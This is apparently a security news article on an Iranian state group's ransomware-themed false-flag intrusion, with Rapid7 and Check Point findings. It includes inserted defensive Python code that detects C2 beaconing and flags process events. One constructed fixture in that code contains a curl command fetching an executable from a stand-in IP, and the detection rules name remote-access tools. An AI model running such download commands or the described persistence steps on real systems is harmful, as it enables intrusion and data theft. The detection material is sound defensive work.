The Iranian state-sponsored hacking group known as MuddyWater (also called Mango Sandstorm, Seedworm, and Static Kitten) has been linked to a ransomware attack that appears to be a deliberate “false flag” operation designed to mislead investigators.
According to a report from Rapid7, the attack — observed in early 2026 — relied on social engineering tactics through Microsoft Teams to begin the infection process. While the incident initially seemed to match the profile of a ransomware-as-a-service (RaaS) group operating under the Chaos brand, deeper analysis revealed it was actually a targeted, state-backed operation disguised as a financially motivated extortion scheme.
“The campaign featured an intensive social engineering phase carried out over Microsoft Teams, where the attackers used interactive screen-sharing sessions to steal credentials and bypass multi-factor authentication (MFA),” Rapid7 explained in a report shared with The Hacker News.
“After gaining access, the group skipped the typical ransomware playbook — instead of encrypting files, they focused on stealing data and maintaining long-term access using remote management tools such as DWAgent.”
The evidence suggests that MuddyWater is increasingly turning to widely available off-the-shelf tools from the cybercrime underground to muddy attribution efforts. This evolving tactic has also been noted by Ctrl-Alt-Intel, Broadcom, Check Point, and JUMPSEC in recent months, all of which have documented the group’s use of tools like CastleRAT and Tsundere.
That said, this is far from MuddyWater’s first foray into ransomware. In September 2020, the group was tied to a campaign targeting high-profile Israeli organizations using a loader named PowGoop, which deployed a destructive variant of Thanos ransomware. Then, in 2023, Microsoft revealed that the group partnered with another threat actor known as DEV-1084 — which operates under the DarkBit persona — to carry out destructive attacks disguised as ransomware operations. As recently as October 2025, the attackers are believed to have deployed the Qilin ransomware against an Israeli government hospital.
“In this case, the emerging picture was that the attackers were likely Iranian-affiliated operators working through the cybercriminal ecosystem, using a criminal ransomware brand and methods associated with the broader extortion market, while serving a strategic Iranian objective,” Check Point noted back in March.
“The use of Qilin, and participation in its affiliate program, likely serves not only as a layer of cover and plausible deniability, but also as a meaningful operational enabler, especially as earlier attacks appear to have heightened security measures and monitoring by Israeli authorities.”
Chaos is a RaaS group that surfaced in early 2025. Known for its double extortion approach, the group has promoted its affiliate program on cybercrime forums such as RAMP and RehubCom.
Attacks carried out by this cybercriminal gang combine email flooding and vishing (voice phishing) through Microsoft Teams — often by impersonating IT support staff — to trick victims into installing remote access tools like Microsoft Quick Assist. The attackers then exploit that initial foothold to dig deeper into the victim’s network and deploy ransomware.
“The group has also demonstrated triple extortion by threatening distributed denial-of-service (DDoS) attacks against the victim’s infrastructure,” Rapid7 said. “These capabilities are reportedly offered to affiliates as part of bundled services, representing a notable feature of its RaaS model. Additionally, Chaos has been observed leveraging elements of quadruple extortion, including threats to contact customers or competitors to increase pressure on victims.”

As of late March 2026, Chaos had listed 36 victims on its data leak site, the majority based in the United States. Construction, manufacturing, and business services are among the key sectors the group has targeted.
In the intrusion examined by Rapid7, the threat actor reportedly initiated external chat requests through Microsoft Teams to engage employees and gain initial access via screen-sharing sessions. From there, the attackers used compromised accounts to conduct reconnaissance, establish persistence using tools like DWAgent and AnyDesk, move laterally across the network, and exfiltrate data. The victim was then contacted via email to begin ransom negotiations.
“While connected, the TA [threat actor] ran basic discovery commands, accessed files related to the victim’s VPN configuration, and instructed users to type their credentials into locally created text files,” Rapid7 explained. “In at least one case, the TA also installed a remote management tool (AnyDesk) to further facilitate access.”
The threat actor was also seen using RDP to download an executable (“ms_upd.exe”) from an external server (“172.86.126[.]208”) via the curl utility. Once executed, the file triggers a multi-stage infection chain that delivers additional malicious components.
A brief overview of the malware families involved is provided below –
- ms_upd.exe (also known as Stagecomp), which gathers system information and contacts a command-and-control (C2) server to retrieve next-stage payloads (game.exe, WebView2Loader.dll, and visualwincomp.txt).
- game.exe (also known as Darkcomp), a custom-built remote access trojan (RAT) disguised as a legitimate Microsoft WebView2 application. It is a trojanized version of the official Microsoft WebView2APISample project.
- WebView2Loader.dll, a legitimate DLL downloaded by ms_upd.exe. It is required by Microsoft Edge WebView2 to embed web content within Windows applications.
- visualwincomp.txt, an encrypted configuration file used by the RAT to obtain C2 server details.
The RAT connects to the C2 server and enters an infinite loop, polling for new commands every 60 seconds. This allows it to execute commands or PowerShell scripts, perform file operations, and launch an interactive cmd.exe shell or PowerShell session.
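The 60-second polling loop described above is exactly the kind of regular beaconing that stands out in network telemetry once connections are grouped per flow. The Python below is an added example, not code from the article or from Rapid7's report: it reads constructed connection-log lines (timestamp, source, destination, port), groups them by flow, and flags flows whose gaps between connections are nearly constant. The log format, the addresses, and the thresholds are assumptions.

```python
import statistics
from collections import defaultdict
from datetime import datetime, timezone
from typing import Dict, List, Tuple

# Constructed sample connection log (not real traffic). Format assumed:
# "<ISO-8601 UTC timestamp> <src_ip> <dst_ip> <dst_port>".
# Flow 1: one-minute polling with a second or so of jitter (beacon-like).
# Flow 2: bursty, human-driven browsing pattern.
# Flow 3: periodic, but too few events to judge.
SAMPLE_LOG = """\
2026-03-10T09:00:00Z 10.0.0.5 203.0.113.10 443
2026-03-10T09:01:00Z 10.0.0.5 203.0.113.10 443
2026-03-10T09:02:01Z 10.0.0.5 203.0.113.10 443
2026-03-10T09:03:00Z 10.0.0.5 203.0.113.10 443
2026-03-10T09:04:00Z 10.0.0.5 203.0.113.10 443
2026-03-10T09:04:59Z 10.0.0.5 203.0.113.10 443
2026-03-10T09:06:00Z 10.0.0.5 203.0.113.10 443
2026-03-10T09:07:00Z 10.0.0.5 203.0.113.10 443
2026-03-10T09:00:00Z 10.0.0.7 198.51.100.20 443
2026-03-10T09:00:05Z 10.0.0.7 198.51.100.20 443
2026-03-10T09:00:47Z 10.0.0.7 198.51.100.20 443
2026-03-10T09:02:00Z 10.0.0.7 198.51.100.20 443
2026-03-10T09:02:13Z 10.0.0.7 198.51.100.20 443
2026-03-10T09:08:20Z 10.0.0.7 198.51.100.20 443
2026-03-10T09:08:30Z 10.0.0.7 198.51.100.20 443
2026-03-10T09:15:00Z 10.0.0.7 198.51.100.20 443
2026-03-10T09:00:00Z 10.0.0.9 203.0.113.10 443
2026-03-10T09:01:00Z 10.0.0.9 203.0.113.10 443
2026-03-10T09:02:00Z 10.0.0.9 203.0.113.10 443
"""

Flow = Tuple[str, str, int]


def parse_line(line: str) -> Tuple[datetime, Flow]:
    """Split one log line into a UTC timestamp and a (src, dst, port) flow key."""
    ts, src, dst, port = line.split()
    when = datetime.strptime(ts, "%Y-%m-%dT%H:%M:%SZ").replace(tzinfo=timezone.utc)
    return when, (src, dst, int(port))


def find_beacons(lines: List[str], min_events: int = 6,
                 max_jitter: float = 0.1) -> List[Dict]:
    """Return flows whose inter-connection gaps are nearly constant.

    jitter = population std-dev of the gaps divided by their median; a value
    near 0 means a fixed timer is driving the connections.
    """
    flows: Dict[Flow, List[datetime]] = defaultdict(list)
    for line in lines:
        if line.strip():
            when, key = parse_line(line)
            flows[key].append(when)

    results = []
    for key, times in flows.items():
        if len(times) < min_events:        # too few samples to call it periodic
            continue
        times.sort()
        gaps = [(b - a).total_seconds() for a, b in zip(times, times[1:])]
        period = statistics.median(gaps)
        if period <= 0:
            continue
        jitter = statistics.pstdev(gaps) / period
        if jitter <= max_jitter:
            results.append({"flow": key, "period_s": period,
                            "jitter": round(jitter, 3), "count": len(times)})
    return results


if __name__ == "__main__":
    for hit in find_beacons(SAMPLE_LOG.splitlines()):
        print(f"{hit['flow']}: every {hit['period_s']:.0f}s "
              f"(jitter {hit['jitter']}, {hit['count']} connections)")
```

Low jitter alone is a heuristic, not proof: software update checks and monitoring agents also connect on fixed timers, so hits need an allow-list of known destinations and correlation with the host-side artifacts (the downloaded executable, the remote management tools) before they are treated as C2.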
The campaign’s connection to MuddyWater is supported by the use of a code-signing certificate attributed to “Donald Gay” to sign “ms_upd.exe.” This same certificate has previously been used by the threat group to sign its malware, including a CastleLoader downloader called Fakeset.
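Several of the host-level artifacts in this writeup (curl fetching an executable from a bare IP address, execution of the downloaded file, installation of DWAgent or AnyDesk, and a binary signed under the “Donald Gay” certificate name) can be checked in process telemetry. The Python below is an added example, not code from the article or from Rapid7: it runs a few such rules over constructed process events whose field names are only loosely modelled on Sysmon. The Signature field, the file paths, the user name and the 203.0.113.10 address are assumptions.

```python
import re
from typing import Dict, List

# Constructed sample events (not from the article or from Rapid7's report).
# Field names are loosely modelled on Sysmon process-creation events; the
# Signature field, paths, user and the 203.0.113.10 address are assumptions.
SAMPLE_EVENTS: List[Dict[str, str]] = [
    {"Image": r"C:\Windows\System32\curl.exe",
     "CommandLine": r"curl.exe -o C:\Users\Public\ms_upd.exe http://203.0.113.10/ms_upd.exe",
     "ParentImage": r"C:\Windows\System32\cmd.exe",
     "Signature": "Microsoft Windows", "User": r"CORP\jdoe"},
    {"Image": r"C:\Users\Public\ms_upd.exe", "CommandLine": "ms_upd.exe",
     "ParentImage": r"C:\Windows\System32\cmd.exe",
     "Signature": "Donald Gay", "User": r"CORP\jdoe"},
    {"Image": r"C:\Program Files (x86)\AnyDesk\AnyDesk.exe",
     "CommandLine": "AnyDesk.exe --install",
     "ParentImage": r"C:\Users\jdoe\Downloads\AnyDesk.exe",
     "Signature": "vendor-signed (constructed)", "User": r"CORP\jdoe"},
    {"Image": r"C:\Program Files\DWAgent\runtime\dwagent.exe",
     "CommandLine": "dwagent.exe", "ParentImage": r"C:\Windows\System32\services.exe",
     "Signature": "vendor-signed (constructed)", "User": "NT AUTHORITY\\SYSTEM"},
    # Benign: curl to a named host, and curl to a raw IP that fetches no executable.
    {"Image": r"C:\Windows\System32\curl.exe",
     "CommandLine": "curl.exe https://www.example.com/api/health",
     "ParentImage": r"C:\Windows\System32\cmd.exe",
     "Signature": "Microsoft Windows", "User": r"CORP\ops"},
    {"Image": r"C:\Windows\System32\curl.exe",
     "CommandLine": "curl.exe http://203.0.113.10/api/status",
     "ParentImage": r"C:\Windows\System32\cmd.exe",
     "Signature": "Microsoft Windows", "User": r"CORP\ops"},
]

DOWNLOADERS = {"curl.exe"}              # extend with other fetch utilities as needed
REMOTE_TOOLS = ("anydesk", "dwagent")   # remote management tools named in the writeup
ABUSED_SIGNERS = {"donald gay"}         # signer name reported for ms_upd.exe

# URL whose host is a bare IPv4 address and whose path ends in an executable type.
IP_URL_RE = re.compile(
    r"https?://(\d{1,3}(?:\.\d{1,3}){3})(?::\d+)?/\S*\.(?:exe|dll|msi|ps1)\b", re.I)
# curl's -o <path> output argument, used to link the download to later execution.
OUTPUT_RE = re.compile(r"(?:^|\s)-o\s+(\S+)")


def image_name(path: str) -> str:
    """Return the lower-cased file name from a Windows or POSIX path."""
    return path.replace("\\", "/").rsplit("/", 1)[-1].lower()


def analyze(events: List[Dict[str, str]]) -> List[Dict[str, str]]:
    """Apply the rules in event order and return one finding per rule hit."""
    findings: List[Dict[str, str]] = []
    downloaded = set()  # lower-cased paths written by a flagged download
    for ev in events:
        name = image_name(ev["Image"])
        cmd = ev.get("CommandLine", "")
        if name in DOWNLOADERS:
            m = IP_URL_RE.search(cmd)
            if m:
                findings.append({"rule": "exe_download_from_raw_ip",
                                 "image": name, "detail": m.group(1)})
                out = OUTPUT_RE.search(cmd)
                if out:
                    downloaded.add(out.group(1).lower())
        if ev["Image"].lower() in downloaded:
            findings.append({"rule": "execution_of_downloaded_file",
                             "image": name, "detail": ev["Image"]})
        if any(tool in ev["Image"].lower() for tool in REMOTE_TOOLS):
            findings.append({"rule": "remote_management_tool",
                             "image": name, "detail": ev.get("User", "")})
        if ev.get("Signature", "").lower() in ABUSED_SIGNERS:
            findings.append({"rule": "known_abused_signer",
                             "image": name, "detail": ev["Signature"]})
    return findings


if __name__ == "__main__":
    for f in analyze(SAMPLE_EVENTS):
        print(f"{f['rule']:30} {f['image']:15} {f['detail']}")
```

The remote-management rule is deliberately broad: DWAgent and AnyDesk are legitimate products, so a hit only means an installation that should be reconciled against the list of tools the organization actually sanctions, which is the persistence channel Rapid7 warns is easy to overlook while responding to the extortion noise.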

These findings highlight the growing overlap between state-sponsored intrusion activity and cybercriminal techniques — a trend aimed at obscuring attribution and slowing down effective defensive responses.
“The use of a RaaS framework in this context may enable the actor to blur the lines between state-sponsored activity and financially motivated cybercrime, making attribution more difficult,” Rapid7 said. “Furthermore, the addition of extortion and negotiation tactics may help direct defensive teams toward addressing the immediate disruption, potentially causing them to overlook deeper persistence mechanisms put in place through remote access tools like DWAgent or AnyDesk.”
Interestingly, even though traces of Chaos ransomware were found, no files were actually encrypted—a notable departure from standard ransomware behavior. This suggests that the ransomware may have been used more as a smokescreen or supporting tool rather than as the main goal of the attack.
This development follows Hunt.io’s disclosure of an Iranian-linked cyber campaign aimed at government entities in Oman, resulting in the theft of over 26,000 user records from the Ministry of Justice, along with judicial case files, committee rulings, and critical SAM and SYSTEM registry hives.
“An exposed directory on IP address 172.86.76[.]127—a virtual private server hosted by RouterHosting in the UAE—revealed an ongoing offensive operation targeting Omani government systems. The attackers left behind their full toolkit, command-and-control code, session logs, and stolen data, all accessible without restriction,” the company reported. “The main focus was the Ministry of Justice and Legal Affairs (mjla.gov[.]om).”
The finding aligns with ongoing cyber activities by pro-Iran hacktivist collectives such as Handala Hack. This group claims to have leaked personal details of nearly 400 U.S. Navy personnel stationed in the Persian Gulf and previously breached the Port of Fujairah in the UAE, gaining access to internal systems and exfiltrating approximately 11,000 sensitive documents—including invoices, shipping manifests, and customs records.
“Just a month ago, we observed a significant surge in Iranian-affiliated cyber operations—ranging from surveillance via compromised cameras to the leak of highly classified documents from Israel’s former military chief, alongside a sharp uptick in regional attack volume. At the time, we warned that further escalation was probable,” said Sergey Shykevich, group manager at Check Point Research, in an interview with The Hacker News.
“If verified, the alleged strike on the Port of Fujairah marks that next phase of escalation. What’s different now is the intent: this isn’t just about espionage or public shaming. Stolen port infrastructure data may have been weaponized to support physical missile targeting,” he added.
“Cyber and kinetic warfare are now directly linked. This campaign shows no signs of slowing. Historically, periods of calm on the ground have preceded intensified cyber offensives—and what we’re witnessing today represents the most dangerous evolution of that cycle yet.”